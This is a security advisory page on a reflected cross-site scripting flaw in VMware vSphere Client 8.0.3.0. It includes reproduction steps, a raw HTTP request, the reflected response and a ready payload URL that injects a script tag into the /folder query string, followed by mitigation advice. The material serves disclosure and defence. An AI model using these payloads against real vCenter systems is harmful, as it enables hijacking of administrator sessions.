BACK TO HOME
VULNERABILITY DATABASE●AUGUST 11, 2025

CVE-2025-41228 - VMware vSphere Client 8.0.3.0 XSS

HOME/VULNERABILITIES/CVE2025-41228-VMWAREVCENTERXSS

VULNERABILITY INFO

CATEGORYVulnerabilities
PUBLISHEDAugust 11, 2025
AUTHORImraan Khan (Lich-Sec)
READ TIME2 MIN

TAGS

#CVE-2025-41228#VMWARE#XSS

SHARE

Reflected XSS in VMware vSphere Client 8.0.3.0 via unsanitized query string on /folder endpoint.

Vulnerability Overview

A reflected Cross-Site Scripting (XSS) vulnerability exists in VMware vSphere Client version 8.0.3.0. The application fails to sanitize input passed via a query string to the /folder endpoint, resulting in arbitrary JavaScript execution when the reflected value is rendered into an HTML form’s action attribute.

Attack Vector: Network (web interface)
Attack Complexity: Low
Privileges Required: Valid authenticated session required to trigger in-browser execution
User Interaction: None (when attacker can induce a victim to visit the crafted URL)
CVE: CVE-2025-41228

Description

The vulnerable endpoint reflects query string input directly into a form action attribute without proper encoding. An attacker who can obtain or coerce an authenticated administrator into opening a crafted URL can achieve arbitrary script execution in the admin's browser context.

Steps to Reproduce

  1. Initiate a benign request:
https://host/folder?ht7j4
  1. Intercept and modify the request using a proxy (e.g., Burp Suite). Inject payload into the query string:
GET /folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1 HTTP/2
Host: 192.168.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Referer: https://192.168.x.x/
Accept: text/html,application/xhtml+xml
  1. Forward the request. Inspect the HTTP response. The payload appears unencoded inside an HTML form:
<form action="/folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1" method="POST">
  <input name="VMware-CSRF-Token" type="hidden" value="..." />
  1. To observe execution, replay the exact malicious request in a browser with an active authenticated session (cookies present) or use Burp's "Open in Browser" with session cookies.

Example payload URL:

https://192.168.x.x/folder?ht7j4"><script>alert(1)</script>tnkav=1

Impact

Arbitrary JavaScript execution within the vSphere Client web interface. Possible consequences:

  • Session hijacking
  • Administrative actions via CSRF
  • Credential theft or phishing within the admin context
  • Further pivoting inside management workflows

Recommendation

Upgrade to VMware vCenter Server 8.0 U3e or later which addresses CVE-2025-41228. If immediate upgrade is not possible:

  • Restrict access to management interfaces to trusted networks and IP ranges.
  • Require VPN or jump-host access for administrative consoles.
  • Apply Content Security Policy (CSP) and additional web-layer controls where feasible.
  • Monitor administrative sessions and anomalous requests to /folder.

References

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41228
  • VMware Security Advisories: https://www.vmware.com/security/advisories

Credits

Discovered / PoC Author: Imraan Khan (Lich-Sec)
EDB ID: 52406
CVE: CVE-2025-41228


⚠️ DISCLAIMER: This document reproduces public exploit disclosure material for defensive and research use. Test only on systems you own or are authorized to test. Unauthorized exploitation is illegal.

RELATED VULNERABILITIES

CVE-2023-44487 - HTTP/2 Rapid Reset Denial of Service

A remote unauthenticated attacker can exploit the HTTP/2 Rapid Reset vulnerability to perform a high-impact denial-of-service attack by rapidly opening and resetting streams, exhausting server resources.

SEP 16, 2025

CVE-2023-43320 Proxmox VE - TOTP Brute Force

Defensive advisory and mitigation guidance for reported Proxmox VE TOTP brute-force activity. PoC code omitted for safety.

JAN 31, 2024

CVE-2023-6553 - WordPress Backup Migration Plugin Remote Code Execution

Unauthenticated remote code execution in WordPress Backup Migration plugin (≤1.3.7) via PHP filter chain injection through Content-Dir header manipulation. Critical web application vulnerability enabling complete server compromise.

DEC 11, 2023
PROFESSIONAL SERVICES

Need Professional Security Audit?

Penetration testing, security assessment and vulnerability research services from our expert team

CONTACT US